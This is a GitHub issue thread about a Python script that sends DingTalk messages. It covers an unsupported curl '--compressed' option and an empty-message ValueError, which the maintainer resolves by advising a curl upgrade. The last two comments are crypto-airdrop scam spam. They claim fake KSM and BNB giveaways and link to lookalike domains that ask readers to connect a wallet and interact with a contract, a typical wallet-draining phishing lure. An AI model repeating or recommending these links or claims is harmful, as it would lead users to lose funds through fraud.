### ISSUE TITLE
text类型，消息内容不能为空

### ISSUE THREAD

**Issue by icegox** [cnhouzi/9jiainfo#1]
curl: option --compressed: the installed libcurl version doesn't support this
curl: try 'curl --help' for more information
ERROR:root:text类型，消息内容不能为空！
Traceback (most recent call last):
  File "D:/JetBrains/PyCharmProjects/9jiainfo-main/9jiainfo-main/9jiainfo.py", line 29, in <module>
    schedule.run_pending()
  File "D:\Python\Python38\lib\site-packages\schedule\__init__.py", line 780, in run_pending
    default_scheduler.run_pending()
  File "D:\Python\Python38\lib\site-packages\schedule\__init__.py", line 100, in run_pending
    self._run_job(job)
  File "D:\Python\Python38\lib\site-packages\schedule\__init__.py", line 172, in _run_job
    ret = job.run()
  File "D:\Python\Python38\lib\site-packages\schedule\__init__.py", line 661, in run
    ret = self.job_func()
  File "D:/JetBrains/PyCharmProjects/9jiainfo-main/9jiainfo-main/9jiainfo.py", line 23, in job
    xiaoding.send_text(msg=c, is_at_all=True)
  File "D:\Python\Python38\lib\site-packages\dingtalkchatbot\chatbot.py", line 125, in send_text
    raise ValueError("text类型，消息内容不能为空！")
ValueError: text类型，消息内容不能为空！

**Comment by icegox** [comment]
感谢博主的帮助，已经成功解决问题了

**Comment by cnhouzi** [comment]
方法:
升级curl 版本
`curl: option --compressed: the installed libcurl version doesn't support this`
具体如何升级，网上有很多教程了～

**Comment by iridescent233** [comment]
@icegox 我也遇到了同样的问题，请问如何解决

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by parallaxlogicdevelopment** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1500 in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @
